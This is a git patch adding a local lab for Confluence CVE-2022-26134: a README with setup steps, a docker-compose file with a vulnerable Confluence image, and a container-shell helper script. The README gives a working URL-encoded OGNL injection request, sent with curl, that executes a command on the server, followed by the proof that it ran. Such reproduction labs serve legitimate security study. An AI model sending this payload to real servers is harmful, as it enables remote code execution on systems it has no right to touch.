From 18fa01a6f6e6f378619f6b7ec18b13b45c85ae46 Mon Sep 17 00:00:00 2001 From: "zma4580@gmail.com" Date: Fri, 3 Jun 2022 18:13:04 -0400 Subject: [PATCH] Add docker-compose file, README and getshell.sh command Add installation steps for confluence server --- .../confluence-cve-2022-26134/README.md | 74 +++++++++++++++++++ .../docker-compose.yml | 16 ++++ .../confluence-cve-2022-26134/getshell.sh | 2 + 3 files changed, 92 insertions(+) create mode 100644 proof-of-concept-exploits/confluence-cve-2022-26134/README.md create mode 100644 proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml create mode 100755 proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh diff --git a/proof-of-concept-exploits/confluence-cve-2022-26134/README.md b/proof-of-concept-exploits/confluence-cve-2022-26134/README.md new file mode 100644 index 0000000..5f937eb --- /dev/null +++ b/proof-of-concept-exploits/confluence-cve-2022-26134/README.md @@ -0,0 +1,74 @@ +# Confluence CVE-2022-26134 OGNL vulnerability + +This vulnerability affects Confluence Server and Confluence Data Center. It allows an attacker to send a specially crafted HTTP request to abuse OGNL within Confluence, leading to remote code execution. + +In order for this vulnerability to be exploitable, the following conditions must be met: +* Use versions of Confluence lower than 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 +* Confluence is configured (can't use a server that hasn't been installed and not connected to a DB) + + +## Running the application + +Run it: + +``` +docker-compose up +``` + +Install confluence + +1. Navigate to `localhost:8090` +2. Get a trial license (this won't work without one) +3. In db setup step, put in hostname: `db`, port: `5432`, dbname: `conf`, username: `postgres`, password: `koko` +4. It'll take a while to configure, make sure you have 3-4gb of RAM +5. Use a test site/template, and use confluence to manage users. Fill in default for admin +6. Once you get past the admin creation step, you can run the exploit + +## Exploitation steps + +``` +curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ +``` + +Output: + +``` +└> curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ +* Trying ::1... +* TCP_NODELAY set +* Connected to localhost (::1) port 8090 (#0) +> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1 +> Host: localhost:8090 +> User-Agent: curl/7.64.1 +> Accept: */* +> +< HTTP/1.1 302 +< Cache-Control: no-store +< Expires: Thu, 01 Jan 1970 00:00:00 GMT +< X-Confluence-Request-Time: 1654294225669 +< Set-Cookie: JSESSIONID=A12C784ACFF928E9155587F78E9EC0C0; Path=/; HttpOnly +< X-XSS-Protection: 1; mode=block +< X-Content-Type-Options: nosniff +< X-Frame-Options: SAMEORIGIN +< Content-Security-Policy: frame-ancestors 'self' +< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fpwned%22%29%7D%2Findex.action&permissionViolation=true +< Content-Type: text/html;charset=UTF-8 +< Content-Length: 0 +< Date: Fri, 03 Jun 2022 22:10:25 GMT +< +* Connection #0 to host localhost left intact +* Closing connection 0 +``` + +Exec into the container + +``` +└> ./getshell.sh confluence + +root@b2db3bfbe364:/var/atlassian/application-data/confluence# ls -lah /tmp +total 12K +drwxrwxrwt 1 root root 4.0K Jun 3 22:12 . +drwxr-xr-x 1 root root 4.0K Jun 3 19:56 .. +drwxr-xr-x 2 confluence confluence 4.0K Jun 3 22:07 hsperfdata_confluence +-rw-r----- 1 confluence confluence 0 Jun 3 22:10 pwned +``` diff --git a/proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml b/proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml new file mode 100644 index 0000000..9dd75cd --- /dev/null +++ b/proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml @@ -0,0 +1,16 @@ +version: "3.9" +services: + conf: + image: atlassian/confluence-server@sha256:83a19d7c474b550b4ab4ef383e93e16c02457d680a982debcaf32b3b7db5bf52 + depends_on: + - db + ports: + - 8090:8090 + - 8091:8091 + # port = 5432, username = postgres + db: + image: postgres + restart: always + environment: + POSTGRES_PASSWORD: koko + POSTGRES_DB: conf diff --git a/proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh b/proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh new file mode 100755 index 0000000..1dee70a --- /dev/null +++ b/proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh @@ -0,0 +1,2 @@ +#!/bin/bash +docker exec -t -i `docker ps | grep "$1" | cut -d " " -f 1` bash